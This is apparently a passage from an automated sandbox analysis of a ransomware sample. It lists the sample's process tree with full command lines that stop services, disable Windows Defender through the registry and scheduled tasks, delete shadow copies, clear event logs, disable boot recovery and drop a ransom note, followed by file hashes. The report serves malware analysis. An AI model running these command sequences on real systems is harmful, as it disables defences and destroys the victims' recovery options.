to memory of 1752 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe sc.exe PID 844 wrote to memory of 1752 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe sc.exe PID 844 wrote to memory of 1752 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe sc.exe PID 844 wrote to memory of 1732 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe sc.exe PID 844 wrote to memory of 1732 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe sc.exe PID 844 wrote to memory of 1732 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe sc.exe PID 844 wrote to memory of 1276 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe sc.exe PID 844 wrote to memory of 1276 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe sc.exe PID 844 wrote to memory of 1276 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe sc.exe PID 844 wrote to memory of 2028 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:760
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1060
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:592 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1596
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:432
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1876
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1504
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:952
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1624
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:968
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1288
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1752
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1732
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1276
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:2028
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1564
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1924
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1708
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:268
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1036
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:564
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1596
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:808
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1168
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:660
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1152
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1524
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1392
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1620
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:560
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1244
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:912
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1044
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:888
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:884
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1616
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1824
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1852
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1320
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:612
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2000
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1696
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:924
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1744
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1612
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:760
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:744
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1816
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1504 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1872
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:540 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1760 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1060 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1928 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1748 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:812 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1920 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:620 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:468
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1272 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1796
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1868 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2136 -
C:\Windows\system32\notepad.exenotepad.exe C:\vyS2_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2532 -
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"2⤵PID:2540
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5b8e610b2334f1c528aa7ec5b8c07f1e4
SHA13583b173c98b14b9fc18c798cecd94fd9889fb31
SHA256187b9e01b982fce924b1c7182002c48cd192205e7b2c2d86ea9c11264bee1792
SHA512743f07cd92debbcbee136af8b2e6e2921e89d6ccd10884a89417448cb378777b086632c6ddab05d02920f7ca9845c86163af0eded72afc8a66bcf1fa887e8494